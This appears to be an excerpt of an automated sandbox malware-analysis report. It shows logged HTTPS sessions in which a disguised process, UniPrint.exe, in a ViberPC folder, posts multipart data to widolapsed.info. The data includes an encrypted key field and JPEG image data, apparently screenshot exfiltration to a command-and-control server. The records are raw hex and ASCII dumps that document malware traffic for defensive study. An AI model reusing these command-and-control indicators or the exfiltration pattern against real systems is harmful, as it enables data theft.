                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:47 UTC2936OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76630
                                                                                                      Content-Type: multipart/form-data; boundary=--------271647860
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:47 UTC2936OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 31 36 34 37 38 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------271647860Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:47 UTC2936OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e0 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:47 UTC2936OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:47 UTC2952OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:47 UTC2968OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:47 UTC2984OUTData Raw: 93 8a 78 8d cf 01 49 fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac dd b7 46 c7 d2 b3 a8 aa 58 7a 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34
                                                                                                      Data Ascii: xI+DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxTFXzk}Km\:o#urNZg%V'4
                                                                                                      2021-09-15 11:46:47 UTC3000OUTData Raw: 45 00 14 51 45 00 2d 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e cd 14 da 5a 2e 16 16 8c d2 66 93 34 5c 2c 3b 34 66 9b 9a 28 b8 58 7e 68 cd 36 8c d3 b8 ac 3b 34 99 a6 d2 e6 95 c7 61 73 4b 9a 6d 26 68 b8 58 75
                                                                                                      Data Ascii: EQE-PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@Z.f4\,;4f(X~h6;4asKm&hXu
                                                                                                      2021-09-15 11:46:47 UTC3011OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 31 36 34 37 38 36 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------271647860--
                                                                                                      2021-09-15 11:46:48 UTC3011INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:47 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=6049f450a86c7a1730d09b84265de356cceeec30170fdc33e04fe3cc32d18290; expires=Thu, 15-Sep-2022 11:46:47 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:48 UTC3011INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.34983045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:49 UTC3011OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76597
                                                                                                      Content-Type: multipart/form-data; boundary=--------2981659231
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:49 UTC3012OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 31 36 35 39 32 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2981659231Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:49 UTC3012OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:49 UTC3012OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:49 UTC3028OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:49 UTC3044OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:49 UTC3060OUTData Raw: 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad 91 2a b4 de ec 97 71 3d 49 a5 cd 34 52 d2 b1 6a 4d 8e a7 0a
                                                                                                      Data Ascii: RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8*q=I4RjM
                                                                                                      2021-09-15 11:46:49 UTC3076OUTData Raw: 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5 61 d9 a4 cd 36 97 34 ae 3b 0b 9a 5c d3 69 33 45 c2 c3 a8 cd
                                                                                                      Data Ascii: (hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFifa64;\i3E
                                                                                                      2021-09-15 11:46:49 UTC3086OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 31 36 35 39 32 33 31 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2981659231--
                                                                                                      2021-09-15 11:46:49 UTC3086INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:49 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=32371b8918f49d051f052c88f77c2d32944b512750ae9f6e1292643728beeb53; expires=Thu, 15-Sep-2022 11:46:49 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:49 UTC3087INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.34975645.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:29 UTC310OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 81298
                                                                                                      Content-Type: multipart/form-data; boundary=--------3135628383
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:29 UTC310OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 33 35 36 32 38 33 38 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3135628383Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:29 UTC310OUTData Raw: 59 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 5a c4 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee ca 9a 10 4e 0f 72 10 20 82 3b 3c 54 aa 1e 5f ee c8 ff 2a 88 63 f3 be db 5f c5 c6 3d 26 b3 58 91 09 97 15 60 fe 43 e5 1b 64 51 4d
                                                                                                      Data Ascii: YiPS4\DB.${OweZ0E_J4f,?:M2gA[DNr ;<T_*c_=&X`CdQM
                                                                                                      2021-09-15 11:45:29 UTC311OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:29 UTC327OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:29 UTC343OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
